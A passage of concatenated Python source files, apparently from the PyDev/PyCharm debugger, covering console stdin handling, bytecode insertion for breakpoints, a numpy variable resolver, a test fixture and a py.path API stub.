from _pydev_bundle.pydev_ipython_console_011 import get_ipython_hidden_vars
# Uncomment to force PyDev standard shell.
# raise ImportError()
#=======================================================================================================================
# InterpreterInterface
#=======================================================================================================================
class InterpreterInterface(BaseInterpreterInterface):
'''
The methods in this class should be registered in the xml-rpc server.
'''
def __init__(self, main_thread, show_banner=True, connect_status_queue=None, rpc_client=None):
BaseInterpreterInterface.__init__(self, main_thread, connect_status_queue, rpc_client)
self.interpreter = get_pydev_frontend(rpc_client)
self._input_error_printed = False
self.notification_succeeded = False
self.notification_tries = 0
self.notification_max_tries = 3
self.show_banner = show_banner
def get_greeting_msg(self):
if self.show_banner:
self.interpreter.show_banner()
return self.interpreter.get_greeting_msg()
def do_add_exec(self, code_fragment):
self.notify_about_magic()
if code_fragment.text.rstrip().endswith('??'):
print('IPython-->')
try:
res = bool(self.interpreter.add_exec(code_fragment.text))
finally:
if code_fragment.text.rstrip().endswith('??'):
print('<--IPython')
return res
def get_namespace(self):
return self.interpreter.get_namespace()
def close(self):
sys.exit(0)
def notify_about_magic(self):
if not self.notification_succeeded:
self.notification_tries+=1
if self.notification_tries>self.notification_max_tries:
return
completions = self.do_get_completions("%", "%")
magic_commands = [x[0] for x in completions]
server = self.get_server()
if server is not None:
try:
server.notifyAboutMagic(magic_commands, self.interpreter.is_automagic())
self.notification_succeeded = True
except :
self.notification_succeeded = False
def get_ipython_hidden_vars_dict(self):
if hasattr(self.interpreter, 'ipython') and hasattr(self.interpreter.ipython, 'user_ns_hidden'):
ipython_shell = self.interpreter.ipython
return get_ipython_hidden_vars(ipython_shell)
```
#### File: pydev/_pydev_bundle/pydev_stdin.py
```python
import sys
# =======================================================================================================================
# BaseStdIn
# =======================================================================================================================
class BaseStdIn:
def __init__(self, original_stdin=sys.stdin, *args, **kwargs):
try:
self.encoding = sys.stdin.encoding
except:
# Not sure if it's available in all Python versions...
pass
self.original_stdin = original_stdin
def readline(self, *args, **kwargs):
# sys.stderr.write('Cannot readline out of the console evaluation\n') -- don't show anything
# This could happen if the user had done input('enter number).<-- upon entering this, that message would appear,
# which is not something we want.
return '\n'
def write(self, *args, **kwargs):
pass # not available StdIn (but it can be expected to be in the stream interface)
def flush(self, *args, **kwargs):
pass # not available StdIn (but it can be expected to be in the stream interface)
def read(self, *args, **kwargs):
# in the interactive interpreter, a read and a readline are the same.
return self.readline()
def close(self, *args, **kwargs):
pass # expected in StdIn
def __iter__(self):
# BaseStdIn would not be considered as Iterable in Python 3 without explicit `__iter__` implementation
return self.original_stdin.__iter__()
def __getattr__(self, item):
# it's called if the attribute wasn't found
if hasattr(self.original_stdin, item):
return getattr(self.original_stdin, item)
raise AttributeError("%s has no attribute %s" % (self.original_stdin, item))
# =======================================================================================================================
# StdIn
# =======================================================================================================================
class StdIn(BaseStdIn):
'''
Object to be added to stdin (to emulate it as non-blocking while the next line arrives)
'''
def __init__(self, interpreter, rpc_client, original_stdin=sys.stdin):
BaseStdIn.__init__(self, original_stdin)
self.interpreter = interpreter
self.rpc_client = rpc_client
def readline(self, *args, **kwargs):
from pydev_console.protocol import KeyboardInterruptException
# Ok, callback into the client to get the new input
try:
requested_input = self.rpc_client.requestInput()
if not requested_input:
return '\n' # Yes, a readline must return something (otherwise we can get an EOFError on the input() call).
return requested_input
except KeyboardInterrupt:
raise # Let KeyboardInterrupt go through -- #PyDev-816: Interrupting infinite loop in the Interactive Console
except KeyboardInterruptException:
# this exception is explicitly declared in `requestInput()` method of `PythonConsoleFrontendService` Thrift service
# it is thrown on the IDE side and transferred by Thrift library as the response to `requestInput()` method
raise
except:
return '\n'
def close(self, *args, **kwargs):
pass # expected in StdIn
#=======================================================================================================================
# DebugConsoleStdIn
#=======================================================================================================================
class DebugConsoleStdIn(BaseStdIn):
'''
Object to be added to stdin (to emulate it as non-blocking while the next line arrives)
'''
def __init__(self, dbg, original_stdin):
BaseStdIn.__init__(self, original_stdin)
self.debugger = dbg
def __pydev_run_command(self, is_started):
try:
cmd = self.debugger.cmd_factory.make_input_requested_message(is_started)
self.debugger.writer.add_command(cmd)
except Exception:
import traceback
traceback.print_exc()
return '\n'
def readline(self, *args, **kwargs):
# Notify Java side about input and call original function
self.__pydev_run_command(True)
result = self.original_stdin.readline(*args, **kwargs)
self.__pydev_run_command(False)
return result
```
#### File: pydev/_pydevd_frame_eval/pydevd_modify_bytecode.py
```python
import dis
import traceback
from opcode import opmap, EXTENDED_ARG, HAVE_ARGUMENT
from types import CodeType
MAX_BYTE = 255
RETURN_VALUE_SIZE = 2
def _add_attr_values_from_insert_to_original(original_code, insert_code, insert_code_list, attribute_name, op_list):
"""
This function appends values of the attribute `attribute_name` of the inserted code to the original values,
and changes indexes inside inserted code. If some bytecode instruction in the inserted code used to call argument
number i, after modification it calls argument n + i, where n - length of the values in the original code.
So it helps to avoid variables mixing between two pieces of code.
:param original_code: code to modify
:param insert_code: code to insert
:param insert_code_obj: bytes sequence of inserted code, which should be modified too
:param attribute_name: name of attribute to modify ('co_names', 'co_consts' or 'co_varnames')
:param op_list: sequence of bytecodes whose arguments should be changed
:return: modified bytes sequence of the code to insert and new values of the attribute `attribute_name` for
original code
"""
orig_value = getattr(original_code, attribute_name)
insert_value = getattr(insert_code, attribute_name)
orig_names_len = len(orig_value)
code_with_new_values = list(insert_code_list)
offset = 0
while offset < len(code_with_new_values):
op = code_with_new_values[offset]
if op in op_list:
new_val = code_with_new_values[offset + 1] + orig_names_len
if new_val > MAX_BYTE:
code_with_new_values[offset + 1] = new_val & MAX_BYTE
code_with_new_values = code_with_new_values[:offset] + [EXTENDED_ARG, new_val >> 8] + \
code_with_new_values[offset:]
offset += 2
else:
code_with_new_values[offset + 1] = new_val
offset += 2
new_values = orig_value + insert_value
return bytes(code_with_new_values), new_values
def _modify_new_lines(code_to_modify, all_inserted_code):
"""
Update new lines in order to hide inserted code inside the original code
:param code_to_modify: code to modify
:param all_inserted_code: list of tuples (offset, list of code instructions) with all inserted pieces of code
:return: bytes sequence of code with updated lines offsets
"""
new_list = list(code_to_modify.co_lnotab)
abs_offset = prev_abs_offset = 0
i = 0
while i < len(new_list):
prev_abs_offset = abs_offset
abs_offset += new_list[i]
for (inserted_offset, inserted_code) in all_inserted_code:
if prev_abs_offset <= inserted_offset < abs_offset:
size_of_inserted = len(inserted_code)
new_list[i] += size_of_inserted
abs_offset += size_of_inserted
if new_list[i] > MAX_BYTE:
new_list[i] = new_list[i] - MAX_BYTE
new_list = new_list[:i] + [MAX_BYTE, 0] + new_list[i:]
i += 2
return bytes(new_list)
def _unpack_opargs(code, inserted_code_list, current_index):
"""
Modified version of `_unpack_opargs` function from module `dis`.
We have to use it, because sometimes code can be in an inconsistent state: if EXTENDED_ARG
operator was introduced into the code, but it hasn't been inserted into `code_list` yet.
In this case we can't use standard `_unpack_opargs` and we should check whether there are
some new operators in `inserted_code_list`.
"""
extended_arg = 0
for i in range(0, len(code), 2):
op = code[i]
if op >= HAVE_ARGUMENT:
if not extended_arg:
# in case if we added EXTENDED_ARG, but haven't inserted it to the source code yet.
for code_index in range(current_index, len(inserted_code_list)):
inserted_offset, inserted_code = inserted_code_list[code_index]
if inserted_offset == i and inserted_code[0] == EXTENDED_ARG:
extended_arg = inserted_code[1] << 8
arg = code[i+1] | extended_arg
extended_arg = (arg << 8) if op == EXTENDED_ARG else 0
else:
arg = None
yield (i, op, arg)
def _update_label_offsets(code_obj, breakpoint_offset, breakpoint_code_list):
"""
Update labels for the relative and absolute jump targets
:param code_obj: code to modify
:param breakpoint_offset: offset for the inserted code
:param breakpoint_code_list: size of the inserted code
:return: bytes sequence with modified labels; list of tuples (resulting offset, list of code instructions) with
information about all inserted pieces of code
"""
inserted_code = list()
# the list with all inserted pieces of code
inserted_code.append((breakpoint_offset, breakpoint_code_list))
code_list = list(code_obj)
j = 0
while j < len(inserted_code):
current_offset, current_code_list = inserted_code[j]
offsets_for_modification = []
for offset, op, arg in _unpack_opargs(code_list, inserted_code, j):
if arg is not None:
if op in dis.hasjrel:
# has relative jump target
label = offset + 2 + arg
if offset < current_offset < label:
# change labels for relative jump targets if code was inserted inside
offsets_for_modification.append(offset)
elif op in dis.hasjabs:
# change label for absolute jump if code was inserted before it
if current_offset < arg:
offsets_for_modification.append(offset)
for i in range(0, len(code_list), 2):
op = code_list[i]
if i in offsets_for_modification and op >= dis.HAVE_ARGUMENT:
new_arg = code_list[i + 1] + len(current_code_list)
if new_arg <= MAX_BYTE:
code_list[i + 1] = new_arg
else:
# handle bytes overflow
if i - 2 > 0 and code_list[i - 2] == EXTENDED_ARG and code_list[i - 1] < MAX_BYTE:
# if new argument > 255 and EXTENDED_ARG already exists we need to increase it's argument
code_list[i - 1] += 1
else:
# if there isn't EXTENDED_ARG operator yet we have to insert the new operator
extended_arg_code = [EXTENDED_ARG, new_arg >> 8]
inserted_code.append((i, extended_arg_code))
code_list[i + 1] = new_arg & MAX_BYTE
code_list = code_list[:current_offset] + current_code_list + code_list[current_offset:]
for k in range(len(inserted_code)):
offset, inserted_code_list = inserted_code[k]
if current_offset < offset:
inserted_code[k] = (offset + len(current_code_list), inserted_code_list)
j += 1
return bytes(code_list), inserted_code
def _return_none_fun():
return None
def add_jump_instruction(jump_arg, code_to_insert):
"""
Add additional instruction POP_JUMP_IF_TRUE to implement a proper jump for "set next statement" action
Jump should be done to the beginning of the inserted fragment
:param jump_arg: argument for jump instruction
:param code_to_insert: code to insert
:return: a code to insert with properly added jump instruction
"""
extended_arg_list = []
if jump_arg > MAX_BYTE:
extended_arg_list += [EXTENDED_ARG, jump_arg >> 8]
jump_arg = jump_arg & MAX_BYTE
# remove 'RETURN_VALUE' instruction and add 'POP_JUMP_IF_TRUE' with (if needed) 'EXTENDED_ARG'
return list(code_to_insert.co_code[:-RETURN_VALUE_SIZE]) + extended_arg_list + [opmap['POP_JUMP_IF_TRUE'], jump_arg]
def insert_code(code_to_modify, code_to_insert, before_line):
"""
Insert piece of code `code_to_insert` to `code_to_modify` right inside the line `before_line` before the
instruction on this line by modifying original bytecode
:param code_to_modify: Code to modify
:param code_to_insert: Code to insert
:param before_line: Number of line for code insertion
:return: boolean flag whether insertion was successful, modified code
"""
linestarts = dict(dis.findlinestarts(code_to_modify))
if before_line not in linestarts.values():
return code_to_modify
offset = None
for off, line_no in linestarts.items():
if line_no == before_line:
offset = off
code_to_insert_list = add_jump_instruction(offset, code_to_insert)
try:
code_to_insert_list, new_names = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_names',
dis.hasname)
code_to_insert_list, new_consts = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_consts',
[opmap['LOAD_CONST']])
code_to_insert_list, new_vars = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_varnames',
dis.haslocal)
new_bytes, all_inserted_code = _update_label_offsets(code_to_modify.co_code, offset, list(code_to_insert_list))
new_lnotab = _modify_new_lines(code_to_modify, all_inserted_code)
except ValueError:
traceback.print_exc()
return False, code_to_modify
new_code = CodeType(
code_to_modify.co_argcount, # integer
code_to_modify.co_kwonlyargcount, # integer
len(new_vars), # integer
code_to_modify.co_stacksize, # integer
code_to_modify.co_flags, # integer
new_bytes, # bytes
new_consts, # tuple
new_names, # tuple
new_vars, # tuple
code_to_modify.co_filename, # string
code_to_modify.co_name, # string
code_to_modify.co_firstlineno, # integer
new_lnotab, # bytes
code_to_modify.co_freevars, # tuple
code_to_modify.co_cellvars # tuple
)
return True, new_code
```
#### File: extensions/types/pydevd_plugin_numpy_types.py
```python
from _pydevd_bundle.pydevd_constants import IS_PYCHARM
from _pydevd_bundle.pydevd_extension_api import TypeResolveProvider, StrPresentationProvider
from _pydevd_bundle.pydevd_resolver import defaultResolver, MAX_ITEMS_TO_HANDLE, TOO_LARGE_ATTR, TOO_LARGE_MSG
from _pydevd_bundle.pydevd_utils import get_var_and_offset
from .pydevd_helpers import find_mod_attr
try:
from collections import OrderedDict
except:
OrderedDict = dict
DEFAULT_PRECISION = 5
# =======================================================================================================================
# NdArrayResolver
# =======================================================================================================================
class NdArrayResolver: pass
class NdArrayItemsContainer: pass
class NDArrayTypeResolveProvider(object):
def can_provide(self, type_object, type_name):
nd_array = find_mod_attr('numpy', 'ndarray')
return nd_array is not None and issubclass(type_object, nd_array)
'''
This resolves a numpy ndarray returning some metadata about the NDArray
'''
def is_numeric(self, obj):
if not hasattr(obj, 'dtype'):
return False
return obj.dtype.kind in 'biufc'
def round_if_possible(self, obj):
try:
return obj.round(DEFAULT_PRECISION)
except TypeError:
return obj
def resolve(self, obj, attribute):
if attribute == '__internals__':
if not IS_PYCHARM:
return defaultResolver.get_dictionary(obj)
if attribute == 'min':
if self.is_numeric(obj):
return obj.min()
else:
return None
if attribute == 'max':
if self.is_numeric(obj):
return obj.max()
else:
return None
if attribute == 'shape':
return obj.shape
if attribute == 'dtype':
return obj.dtype
if attribute == 'size':
return obj.size
if attribute.startswith('['):
container = NdArrayItemsContainer()
i = 0
format_str = '%0' + str(int(len(str(len(obj))))) + 'd'
for item in obj:
setattr(container, format_str % i, item)
i += 1
if i > MAX_ITEMS_TO_HANDLE:
setattr(container, TOO_LARGE_ATTR, TOO_LARGE_MSG)
break
return container
if IS_PYCHARM and attribute == 'array':
container = NdArrayItemsContainer()
container.items = obj
return container
return None
def get_dictionary(self, obj):
ret = dict()
if not IS_PYCHARM:
ret['__internals__'] = defaultResolver.get_dictionary(obj)
if obj.size > 1024 * 1024:
ret['min'] = 'ndarray too big, calculating min would slow down debugging'
ret['max'] = 'ndarray too big, calculating max would slow down debugging'
else:
if self.is_numeric(obj):
ret['min'] = obj.min()
ret['max'] = obj.max()
else:
ret['min'] = 'not a numeric object'
ret['max'] = 'not a numeric object'
ret['shape'] = obj.shape
ret['dtype'] = obj.dtype
ret['size'] = obj.size
if IS_PYCHARM:
ret['array'] = NdArrayItemsContainer()
else:
ret['[0:%s] ' % (len(obj))] = list(obj[0:MAX_ITEMS_TO_HANDLE])
return ret
class NDArrayStrProvider(object):
def can_provide(self, type_object, type_name):
nd_array = find_mod_attr('numpy', 'ndarray')
return nd_array is not None and issubclass(type_object, nd_array)
def get_str(self, val):
return str(val[:MAX_ITEMS_TO_HANDLE])
class NdArrayItemsContainerProvider(object):
def can_provide(self, type_object, type_name):
return issubclass(type_object, NdArrayItemsContainer)
def resolve(self, obj, attribute):
if attribute == '__len__':
return None
return obj.items[int(attribute)]
def get_dictionary(self, obj):
obj, offset = get_var_and_offset(obj)
l = len(obj.items)
d = OrderedDict()
format_str = '%0' + str(int(len(str(l)))) + 'd'
i = offset
for item in obj.items[offset:offset + MAX_ITEMS_TO_HANDLE]:
d[format_str % i] = item
i += 1
if i > MAX_ITEMS_TO_HANDLE + offset:
break
d['__len__'] = l
return d
import sys
if not sys.platform.startswith("java"):
TypeResolveProvider.register(NDArrayTypeResolveProvider)
if IS_PYCHARM:
TypeResolveProvider.register(NdArrayItemsContainerProvider)
StrPresentationProvider.register(NDArrayStrProvider)
```
#### File: pydev/tests_pydevd_python/_bytecode_overflow_example.py
```python
import re
en_lang_symbols = r'[^\w!@#$%\^-_+=|\}{][\"\';:?\/><.,&)(*\s`\u2019]'
en_words_basic = []
en_words = []
TRACE_MESSAGE = "Trace called"
def tracing():
print(TRACE_MESSAGE)
def call_tracing():
tracing()
class Dummy:
non_en_words_limit = 3
@staticmethod
def fun(text):
words = tuple(w[0].lower() for w in re.finditer(r'[a-zA-Z]+', text))
non_en_pass = []
for i, word in enumerate(words):
non_en = []
if not (word in en_words_basic
or (word.endswith('s') and word[:-1] in en_words_basic)
or (word.endswith('ed') and word[:-2] in en_words_basic)
or (word.endswith('ing') and word[:-3] in en_words_basic)
or word in en_words
or (word.endswith('s') and word[:-1] in en_words)
or (word.endswith('ed') and word[:-2] in en_words)
or (word.endswith('ing') and word[:-3] in en_words)
):
non_en.append(word)
non_en_pass.append(word)
for j in range(1, Dummy.non_en_words_limit):
if i + j >= len(words):
break
word = words[i + j]
if (word in en_words_basic
or (word.endswith('s') and word[:-1] in en_words_basic)
or (word.endswith('ed') and word[:-2] in en_words_basic)
or (word.endswith('ing') and word[:-3] in en_words_basic)
or word in en_words
or (word.endswith('s') and word[:-1] in en_words)
or (word.endswith('ed') and word[:-2] in en_words)
or (word.endswith('ing') and word[:-3] in en_words)
):
break
else:
non_en.append(word)
non_en_pass.append(word)
class DummyTracing:
non_en_words_limit = 3
@staticmethod
def fun(text):
words = tuple(w[0].lower() for w in re.finditer(r'[a-zA-Z]+', text))
tracing()
non_en_pass = []
for i, word in enumerate(words):
non_en = []
if not (word in en_words_basic
or (word.endswith('s') and word[:-1] in en_words_basic)
or (word.endswith('ed') and word[:-2] in en_words_basic)
or (word.endswith('ing') and word[:-3] in en_words_basic)
or word in en_words
or (word.endswith('s') and word[:-1] in en_words)
or (word.endswith('ed') and word[:-2] in en_words)
or (word.endswith('ing') and word[:-3] in en_words)
):
non_en.append(word)
non_en_pass.append(word)
for j in range(1, Dummy.non_en_words_limit):
if i + j >= len(words):
break
word = words[i + j]
if (word in en_words_basic
or (word.endswith('s') and word[:-1] in en_words_basic)
or (word.endswith('ed') and word[:-2] in en_words_basic)
or (word.endswith('ing') and word[:-3] in en_words_basic)
or word in en_words
or (word.endswith('s') and word[:-1] in en_words)
or (word.endswith('ed') and word[:-2] in en_words)
or (word.endswith('ing') and word[:-3] in en_words)
):
break
else:
non_en.append(word)
non_en_pass.append(word)
```
#### File: py/path/__init__.py
```python
class NeverRaised(Exception):
pass
class PathBase(object):
""" shared implementation for filesystem path objects."""
def basename(self):
""" basename part of path. """
def dirname(self):
""" dirname part of path. """
def purebasename(self):
""" pure base name of the path."""
def ext(self):
""" extension of the path (including the '.')."""
def dirpath(self, *args, **kwargs):
""" return the directory path joined with any given path arguments. """
def read_binary(self):
""" read and return a bytestring from reading the path. """
def read_text(self, encoding):
""" read and return a Unicode string from reading the path. """
def read(self, mode='r'):
""" read and return a bytestring from reading the path. """
def readlines(self, cr=1):
""" read and return a list of lines from the path. if cr is False, the
newline will be removed from the end of each line. """
def load(self):
""" (deprecated) return object unpickled from self.read() """
def move(self, target):
""" move this path to target. """
def __repr__(self):
""" return a string representation of this path. """
def check(self, **kw):
""" check a path for existence and properties.
Without arguments, return True if the path exists, otherwise False.
valid checkers::
file=1 # is a file
file=0 # is not a file (may not even exist)
dir=1 # is a dir
link=1 # is a link
exists=1 # exists
You can specify multiple checker definitions, for example::
path.check(file=1, link=1) # a link pointing to a file
"""
def fnmatch(self, pattern):
"""return true if the basename/fullname matches the glob-'pattern'.
valid pattern characters::
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
If the pattern contains a path-separator then the full path
is used for pattern matching and a '*' is prepended to the
pattern.
if the pattern doesn't contain a path-separator the pattern
is only matched against the basename.
"""
def relto(self, relpath):
""" return a string which is the relative part of the path
to the given 'relpath'.
"""
def ensure_dir(self, *args):
""" ensure the path joined with args is a directory. """
def bestrelpath(self, dest):
""" return a string which is a relative path from self
(assumed to be a directory) to dest such that
self.join(bestrelpath) == dest and if not such
path can be determined return dest.
"""
def exists(self):
""" check a path for existence """
def isdir(self):
""" check a directory for existence. """
def isfile(self):
""" check a file for existence. """
def parts(self, reverse=False):
""" return a root-first list of all ancestor directories
plus the path itself.
"""
def common(self, other):
""" return the common part shared with the other path
or None if there is no common part.
"""
def visit(self, fil=None, rec=None, ignore=NeverRaised, bf=False, sort=False):
""" yields all paths below the current one
fil is a filter (glob pattern or callable), if not matching the
path will not be yielded, defaulting to None (everything is
returned)
rec is a filter (glob pattern or callable) that controls whether
a node is descended, defaulting to None
ignore is an Exception class that is ignoredwhen calling dirlist()
on any of the paths (by default, all exceptions are reported)
bf if True will cause a breadthfirst search instead of the
default depthfirst. Default: False
sort if True will sort entries within each directory level.
"""
def samefile(self, other):
""" return True if other refers to the same stat object as self. """
# py.path.local
class PosixPath(PathBase):
def chown(self, user, group, rec=0):
""" change ownership to the given user and group.
user and group may be specified by a number or
by a name. if rec is True change ownership
recursively.
"""
def readlink(self):
""" return value of a symbolic link. """
def mklinkto(self, oldname):
""" posix style hard link to another name. """
def mksymlinkto(self, value, absolute=1):
""" create a symbolic link with the given value (pointing to another name). """
class LocalPath(PosixPath):
""" object oriented interface to os.path and other local filesystem
related information.
"""
class ImportMismatchError(ImportError):
""" raised on pyimport() if there is a mismatch of __file__'s"""
def __init__(self, path=None, expanduser=False):
""" Initialize and return a local Path instance.
Path can be relative to the current directory.
If path is None it defaults to the current working directory.
If expanduser is True, tilde-expansion is performed.
Note that Path instances always carry an absolute path.
Note also that passing in a local path object will simply return
the exact same path object. Use new() to get a new copy.
"""
def samefile(self, other):
""" return True if 'other' references the same file as 'self'.
"""
def remove(self, rec=1, ignore_errors=False):
""" remove a file or directory (or a directory tree if rec=1).
if ignore_errors is True, errors while removing directories will
be ignored.
"""
def computehash(self, hashtype="md5", chunksize=524288):
""" return hexdigest of hashvalue for this file. """
def new(self, **kw):
""" create a modified version of this path.
the following keyword arguments modify various path parts::
a:/some/path/to/a/file.ext
xx drive
xxxxxxxxxxxxxxxxx dirname
xxxxxxxx basename
xxxx purebasename
xxx ext
"""
def dirpath(self, *args, **kwargs):
""" return the directory path joined with any given path arguments. """
def join(self, *args, **kwargs):
""" return a new path by appending all 'args' as path
components. if abs=1 is used restart from root if any
of the args is an absolute path.
"""
def open(self, mode='r', ensure=False, encoding=None):
""" return an opened file with the given mode.
If ensure is True, create parent directories if needed.
"""
def islink(self):
pass
def check(self, **kw):
pass
def listdir(self, fil=None, sort=None):
""" list directory contents, possibly filter by the given fil func
and possibly sorted.
"""
def size(self):
""" return size of the underlying file object """
def mtime(self):
""" return last modification time of the path. """
def copy(self, target, mode=False, stat=False):
""" copy path to target.
If mode is True, will copy copy permission from path to target.
If stat is True, copy permission, last modification
time, last access time, and flags from path to target.
"""
def rename(self, target):
""" rename this path to target. """
def dump(self, obj, bin=1):
""" pickle object into path location"""
def mkdir(self, *args):
""" create & return the directory joined with args. """
def write_binary(self, data, ensure=False):
""" write binary data into path. If ensure is True create
missing parent directories.
"""
def write_text(self, data, encoding, ensure=False):
""" write text data into path using the specified encoding.
If ensure is True create missing parent directories.
"""
def write(self, data, mode='w', ensure=False):
""" write data into path. If ensure is True create
missing parent directories.
"""
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). if you specify a keyword argument 'dir=True'
then the path is forced to be a directory path.
"""
def stat(self, raising=True):
""" Return an os.stat() tuple. """
def lstat(self):
""" Return an os.lstat() tuple. """
def setmtime(self, mtime=None):
""" set modification time for the given path. if 'mtime' is None
(the default) then the file's mtime is set to current time.
Note that the resolution for 'mtime' is platform dependent.
"""
def chdir(self):
""" change directory to self and return old current directory """
def realpath(self):
""" return a new path which contains no symbolic links."""
def atime(self):
""" return last access time of the path. """
def chmod(self, mode, rec=0):
""" change permissions to the given mode. If mode is an
integer it directly encodes the os-specific modes.
if rec is True perform recursively.
"""
def pypkgpath(self):
""" return the Python package path by looking for the last
directory upwards which still contains an __init__.py.
Return None if a pkgpath can not be determined.
"""
def pyimport(self, modname=None, ensuresyspath=True):
""" return path as an imported python module.
If modname is None, look for the containing package
and construct an according module name.
The module will be put/looked up in sys.modules.
if ensuresyspath is True then the root dir for importing
the file (taking __init__.py files into account) will
be prepended to sys.path if it isn't there already.
If ensuresyspath=="append" the root dir will be appended
if it isn't already contained in sys.path.
if ensuresyspath is False no modification of syspath happens.
"""
def sysexec(self, *argv, **popen_opts):
""" return stdout text from executing a system child process,
where the 'self' path points to executable.
The process is directly invoked and not through a system shell.
"""
def sysfind(cls, name, checker=None, paths=None):
""" return a path object found by looking at the systems
underlying PATH specification. If the checker is not None
it will be invoked to filter matching paths. If a binary
cannot be found, None is returned
Note: This is probably not working on plain win32 systems
but may work on cygwin.
"""
def get_temproot(cls):
""" return the system's temporary directory
(where tempfiles are usually created in)
"""
def mkdtemp(cls, rootdir=None):
""" return a Path object pointing to a fresh new temporary directory
(which we created ourself).
"""
def make_numbered_dir(cls, prefix='session-', rootdir=None, keep=3,
lock_timeout = 172800): # two days
""" return unique directory with a number greater than the current
maximum one. The number is assumed to start directly after prefix.
if keep is true directories with a number less than (maxnum-keep)
will be removed.
"""
local = LocalPath
# py.path.cacheutil
"""
This module contains multithread-safe cache implementations.
All Caches have
getorbuild(key, builder)
delentry(key)
methods and allow configuration when instantiating the cache class.
"""
class BasicCache(object):
""" BasicCache class.
"""
class BuildcostAccessCache(BasicCache):
""" A BuildTime/Access-counting cache implementation.
the weight of a value is computed as the product of
num-accesses-of-a-value * time-to-build-the-value
The values with the least such weights are evicted
if the cache maxentries threshold is superceded.
For implementation flexibility more than one object
might be evicted at a time.
"""
class AgingCache(BasicCache):
""" This cache prunes out cache entries that are too old.
"""
# py.path.svnwc
class SvnPathBase(PathBase):
""" Base implementation for SvnPath implementations. """
def new(self, **kw):
""" create a modified version of this path. A 'rev' argument
indicates a new revision.
the following keyword arguments modify various path parts::
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
def join(self, *args):
""" return a new Path (with the same revision) which is composed
of the self Path followed by 'args' path components.
"""
def propget(self, name):
""" return the content of the given property. """
def proplist(self):
""" list all property names. """
def size(self):
""" Return the size of the file content of the Path. """
def mtime(self):
""" Return the last modification time of the file. """
class SvnWCCommandPath(PathBase):
""" path implementation offering access/modification to svn working copies.
It has methods similar to the functions in os.path and similar to the
commands of the svn client.
"""
def dump(self, obj):
""" pickle object into path location"""
def svnurl(self):
""" return current SvnPath for this WC-item. """
def switch(self, url):
""" switch to given URL. """
def checkout(self, url=None, rev=None):
""" checkout from url to local wcpath. """
def update(self, rev='HEAD', interactive=True):
""" update working copy item to given revision. (None -> HEAD). """
def write(self, content, mode='w'):
""" write content into local filesystem wc. """
def dirpath(self, *args):
""" return the directory Path of the current Path. """
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). if you specify a keyword argument 'directory=True'
then the path is forced to be a directory path.
"""
def mkdir(self, *args):
""" create & return the directory joined with args. """
def add(self):
""" add ourself to svn """
def remove(self, rec=1, force=1):
""" remove a file or a directory tree. 'rec'ursive is
ignored and considered always true (because of
underlying svn semantics.
"""
def copy(self, target):
""" copy path to target."""
def rename(self, target):
""" rename this path to target. """
def lock(self):
""" set a lock (exclusive) on the resource """
def unlock(self):
""" unset a previously set lock """
def cleanup(self):
""" remove any locks from the resource """
def status(self, updates=0, rec=0, externals=0):
""" return (collective) Status object for this file. """
def diff(self, rev=None):
""" return a diff of the current path against revision rev (defaulting
to the last one).
"""
def blame(self):
""" return a list of tuples of three elements:
(revision, commiter, line)
"""
def commit(self, msg='', rec=1):
""" commit with support for non-recursive commits """
def propset(self, name, value, *args):
""" set property name to value on this path. """
def propget(self, name):
""" get property name on this path. """
def propdel(self, name):
""" delete property name on this path. """
def proplist(self, rec=0):
""" return a mapping of property names to property values.
If rec is True, then return a dictionary mapping sub-paths to such mappings.
"""
def revert(self, rec=0):
""" revert the local changes of this path. if rec is True, do so
recursively. """
def new(self, **kw):
""" create a modified version of this path. A 'rev' argument
indicates a new revision.
the following keyword arguments modify various path parts:
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
def join(self, *args, **kwargs):
""" return a new Path (with the same revision) which is composed
of the self Path followed by 'args' path components.
"""
def info(self, usecache=1):
""" return an Info structure with svn-provided information. """
def listdir(self, fil=None, sort=None):
""" return a sequence of Paths.
listdir will return either a tuple or a list of paths
depending on implementation choices.
"""
def open(self, mode='r'):
""" return an opened file with the given mode. """
def log(self, rev_start=None, rev_end=1, verbose=False):
""" return a list of LogEntry instances for this path.
rev_start is the starting revision (defaulting to the first one).
rev_end is the last revision (defaulting to HEAD).
if verbose is True, then the LogEntry instances also know which files changed.
"""
class SvnAuth(object):
""" container for auth information for Subversion """
svnwc = SvnWCCommandPath
# py.path.svnurl
class SvnCommandPath(SvnPathBase):
""" path implementation that offers access to (possibly remote) subversion
repositories. """
def open(self, mode='r'):
""" return an opened file with the given mode. """
def dirpath(self, *args, **kwargs):
""" return the directory path of the current path joined
with any given path arguments.
"""
# modifying methods (cache must be invalidated)
def mkdir(self, *args, **kwargs):
""" create & return the directory joined with args.
pass a 'msg' keyword argument to set the commit message.
"""
def copy(self, target, msg='copied by py lib invocation'):
""" copy path to target with checkin message msg."""
def rename(self, target, msg="renamed by py lib invocation"):
""" rename this path to target with checkin message msg. """
def remove(self, rec=1, msg='removed by py lib invocation'):
""" remove a file or directory (or a directory tree if rec=1) with
checkin message msg."""
def export(self, topath):
""" export to a local path
topath should not exist prior to calling this, returns a
py.path.local instance
"""
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). If you specify a keyword argument 'dir=True'
then the path is forced to be a directory path.
"""
# end of modifying methods
def info(self):
""" return an Info structure with svn-provided information. """
def listdir(self, fil=None, sort=None):
""" list directory contents, possibly filter by the given fil func
and possibly sorted.
"""
def log(self, rev_start=None, rev_end=1, verbose=False):
""" return a list of LogEntry instances for this path.
rev_start is the starting revision (defaulting to the first one).
rev_end is the last revision (defaulting to HEAD).
if verbose is True, then the LogEntry instances also know which files changed.
"""
svnurl = SvnCommandPath
```
#### File: contrib/tracking/__init__.py
```python
from __future__ import absolute_import
import os.path
import time
from ...thrift import TClient, TApplicationException, TMessageType, \
TProcessor, TType
from ...parser import load
track_method = "__thriftpy_tracing_method_name__v2"
track_thrift = load(os.path.join(os.path.dirname(__file__), "tracking.thrift"))
__all__ = ["TTrackedClient", "TTrackedProcessor", "TrackerBase",
"ConsoleTracker"]
